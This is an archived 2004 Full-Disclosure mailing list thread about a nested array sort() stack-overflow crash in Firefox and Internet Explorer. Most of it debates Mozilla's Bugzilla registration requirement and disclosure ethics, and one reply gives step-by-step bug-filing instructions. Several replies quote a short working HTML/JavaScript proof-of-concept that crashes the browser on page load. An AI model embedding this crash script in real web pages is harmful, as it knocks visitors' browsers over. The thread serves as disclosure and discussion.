Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception
Jose Nazario wrote: On Thu, 25 Nov 2004, Heikki Toivonen wrote: 3. Either login if you already have an account, or click create new account. Let's assume we need to create a new account... 4. Type in a valid email address and click Create Account 5. [mail] Read email that was sent to the address to get password 6. back on in the browser, click log in here 7. fill in your username and password and click login [snip the rest of useful info on how to post good, healthy, actionable bug reports] requiring someone to register to post a bug is harmful in the sense that you wind up turning off peopl ewho simply can't be bothered to fill out that info or wish to remain anonymous. Hence the [EMAIL PROTECTED] address. If you are anxious to get the bug fixed you have the option of filling out the form and thereby making yourself available for further questions, getting email with bug updates and the ability to submit coredumps and whatnot. If you're not so anxious you can simply send in an email and be content with having let them know about it. Firefox still has the benefit of running on a multitude of platforms and architectures. Someone trying to exploit a vulnerability in it (as opposed to just crashing it) would have to know both to be successful. while i definitely see the benefit of forcing registration or even wanting it, i bet you'e losing more bug reports than you care to imagine this way. Perhaps the problem lies in the fact that the mozilla coders want people to use the forum so they don't promote the [EMAIL PROTECTED] mail address enough? benefits of forcing/encouraging registration include: - garaunteed line of followup - reduced spam quantities in bugzilla - at leasta cutofof i care enough to ... still, you're losing more than you may expect. i know i've failed to file bug reports (non-security related) for mozilla products due to this speed bump. the security@ route is useful, and i'm glad you pointed it out. this point should be considered by anyone who runs a bug reporting page for open submissions, you may be doing more harm than benefit. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception
Jose Nazario [EMAIL PROTECTED] writes: requiring someone to register to post a bug is harmful in the sense that you wind up turning off peopl ewho simply can't be bothered to fill out that info Exactly. -- Esben Stien is [EMAIL PROTECTED] http://www.esben-stien.name irc://irc.esben-stien.name/%23contact [sip|iax]:[EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception
Jose Nazario wrote: benefits of forcing/encouraging registration include: - garaunteed line of followup - reduced spam quantities in bugzilla - at leasta cutofof i care enough to ... Currently more than half of the bugs that do get filed end up wasting time rather than helping (duplicates, invalid, already fixed in a newer version, no one else can reproduce). These are not minor benefits, the situation would be far worse with drive-by bug reporting. still, you're losing more than you may expect. i know i've failed to file bug reports (non-security related) for mozilla products due to this speed bump. It is a real problem, knowing where to draw the line is hard. For people who don't wish to get as involved there are other places bugs could be reported more informally (newsgroups, web forums, irc) and other volunteers would most likely file the bugs for you if they can be reproduced. http://www.mozilla.org/support/#community -Dan Veditz ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception
Jose Nazario wrote: On Thu, 25 Nov 2004, Heikki Toivonen wrote: 3. Either login if you already have an account, or click create new account. Let's assume we need to create a new account... requiring someone to register to post a bug is harmful in the sense that you wind up turning off peopl ewho simply can't be bothered to fill out that info or wish to remain anonymous. while i definitely see the benefit of forcing registration or even wanting it, i bet you'e losing more bug reports than you care to imagine this way. You won't be losing anonymity - just create a Bugzilla account on Yahoo! or some other free email service and use that for Bugzilla mail. Your post also pointed out the benefits of requiring registration, and I think they far outweigh the possibility of some bug going unnoticed since it was not reported. If you receive a bug report but can't reproduce it, and you can't communicate with the reporter, you can't do anything but ignore that report. And if it was not important enough for anyone to register and file the bug, then maybe it wasn't important enough to fix. But still, having said all this, the Mozilla Foundation is working on finding alternative ways for people to file bug reports, and make it easier. -- Heikki Toivonen signature.asc Description: OpenPGP digital signature
Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception
On Thu, 25 Nov 2004, Heikki Toivonen wrote: 3. Either login if you already have an account, or click create new account. Let's assume we need to create a new account... 4. Type in a valid email address and click Create Account 5. [mail] Read email that was sent to the address to get password 6. back on in the browser, click log in here 7. fill in your username and password and click login [snip the rest of useful info on how to post good, healthy, actionable bug reports] requiring someone to register to post a bug is harmful in the sense that you wind up turning off peopl ewho simply can't be bothered to fill out that info or wish to remain anonymous. while i definitely see the benefit of forcing registration or even wanting it, i bet you'e losing more bug reports than you care to imagine this way. benefits of forcing/encouraging registration include: - garaunteed line of followup - reduced spam quantities in bugzilla - at leasta cutofof i care enough to ... still, you're losing more than you may expect. i know i've failed to file bug reports (non-security related) for mozilla products due to this speed bump. the security@ route is useful, and i'm glad you pointed it out. this point should be considered by anyone who runs a bug reporting page for open submissions, you may be doing more harm than benefit. jose nazario, ph.d. [EMAIL PROTECTED] http://monkey.org/~jose/http://infosecdaily.net/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Sta ck overflow exception
An email to [EMAIL PROTECTED] would have sufficed. That email address can be found at http://www.mozilla.org/security/bug-bounty.html Phil Phil Randal Network Engineer Herefordshire Council Hereford, UK -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Berend-Jan Wever Sent: 25 November 2004 01:05 To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception Hi all, Same flaw works for Firefox as well as MSIE: HTML SCRIPT a = new Array(); while (1) { (a = new Array(a)).sort(); } /SCRIPT SCRIPT a = new Array(); while (1) { (a = new Array(a)).sort(); } /SCRIPT /HTML Added to the list: http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html I'd have loved to CC mozilla about this, but I didn't have the time to do the crash course how to write a bug report and go through all that bugzilla crap. Cheers, SkyLined http://www.edup.tudelft.nl/~bjwever ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception
So instead you unleash it upon kiddie and spammer world? That's lovely. Next you will come by again and say: I'm still hoping I get to see the guy who wrote those MyDoom worms in court, he violated the GPL and spread millions(?) of copies of my (modified) source). So, you release it like you did and, expect what? Some people are advocates of this or that disclosure mechanism, and believe they are right. I can bite. You just say: I'm so cool. I will release this, get a ton of attention and then say 'hey! They violated GPL! How dare they?!' Full disclosure. Responsible disclosure (according to whoever). Non-disclosure. Fine. What are you doing? I agree, not to mention that that bugzilla crap is not really crap. I find it to be a solid system for the most part. Also, It has been proven that involving the general public to help out in filing bugs has been useful in resolving problems that would otherwise go unnoticed until script kiddies start abusing them. Plus bugzilla is not really that hard to use, takes just a few minutes really. -- http://www.loconet.ca ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] FIREFOX flaws: nested array sort()
So, where do you all stand. Exploit for fame or for purpose? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Berend-Jan Wever Sent: 25 November 2004 01:05 To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception Hi all, Same flaw works for Firefox as well as MSIE: HTML SCRIPT a = new Array(); while (1) { (a = new Array(a)).sort(); } /SCRIPT SCRIPT a = new Array(); while (1) { (a = new Array(a)).sort(); } /SCRIPT /HTML Added to the list: http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html I'd have loved to CC mozilla about this, but I didn't have the time to do the crash course how to write a bug report and go through all that bugzilla crap. Cheers, SkyLined http://www.edup.tudelft.nl/~bjwever Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception
Berend-Jan Wever wrote: I'd have loved to CC mozilla about this, but I didn't have the time to do the crash course how to write a bug report and go through all that bugzilla crap. Well, Mozilla does have a well know security email alias for those who don't have the time to do a crash course on Bugzilla - see http://www.mozilla.org/projects/security/security-bugs-policy.html (but if you don't have time visit that link, I'll save you the trouble and say it starts with [EMAIL PROTECTED]) Bugzilla really isn't that difficult either. Below are detailed instructions if anyone cares. Steps 4-6 you can ignore if you already have a Bugzilla account. Step 9 gives detailed info on what to fill in the actual bug reporting form. There are only two critically important pieces on that form: the details text box, and the security checkbox. However, carefully filling in as much information as you can will make it likelier the bug gets fixed faster. 1. Type bugzilla.mozilla.org in your browsers location bar and go there 2. Click the link: Report A Bug 3. Either login if you already have an account, or click create new account. Let's assume we need to create a new account... 4. Type in a valid email address and click Create Account 5. [mail] Read email that was sent to the address to get password 6. back on in the browser, click log in here 7. fill in your username and password and click login 8. Select product link, for example Firefox 9. there's a form to fill in, let's go this part over in detail since I think this is the scariest part: 9.1 There is a search box, but if you are reporting a security bug in the latest product, chances are there are no dupes so just jump on over 9.2 Select a component that you think most closely describes where the problem occurs - if you can't figure out, just choose something, for example General 9.3 Hardware, operating system and build identifier are already filled in correctly for you if you are reporting the bug in the same product where you found it - if you can't figure these out, don't worry - just describe the stuff later on 9.4 If you know a URL where this happens (for example a testcase), fill that in 9.5 Give a brief summary 9.6 The details are next - basically what you'd put in a vulnerability report email or post goes here 9.7 Next it's going to ask even in more details, just to make sure the developers get all the info - if you already filled these parts in the details section, you can ignore them. The fields are: reproducibility, steps to reproduce, actual results, expected results, additional information 9.8 IMPORTANT: Check that security box! This way your bug will get the speediest attention, and it will also restrict people access to the bug until it is opened (either by you or someone else) 9.9 lastly severity 10. Submit bug report, and you are done! Then, whenever someone changes the bug, you will get an email of the changes with a link to the bug. People may ask you more questions etc. Commenting on the bug later on is trivial - just go the URL (Bugzilla may ask you to login again), type in your comments in the Additional Comments textbox and hit the Commit button. There are a lot of other fields, but typically the developers and more experienced Bugzilla users will take care of changing those. At this point the bug basically resembles a normal web forum from user's point of view. And if you really have the time, I recommend you go read the docs that are linked under the When reporting a bug section on https://bugzilla.mozilla.org/ -- Heikki Toivonen signature.asc Description: OpenPGP digital signature
Re: [Full-Disclosure] FIREFOX flaws: nested array sort()
Sounds like he does it For fun. That's what I'd do. RandallM wrote: So, where do you all stand. Exploit for fame or for purpose? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Berend-Jan Wever Sent: 25 November 2004 01:05 To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception Hi all, Same flaw works for Firefox as well as MSIE: HTML SCRIPT a = new Array(); while (1) { (a = new Array(a)).sort(); } /SCRIPT SCRIPT a = new Array(); while (1) { (a = new Array(a)).sort(); } /SCRIPT /HTML Added to the list: http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html I'd have loved to CC mozilla about this, but I didn't have the time to do the crash course how to write a bug report and go through all that bugzilla crap. Cheers, SkyLined http://www.edup.tudelft.nl/~bjwever Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html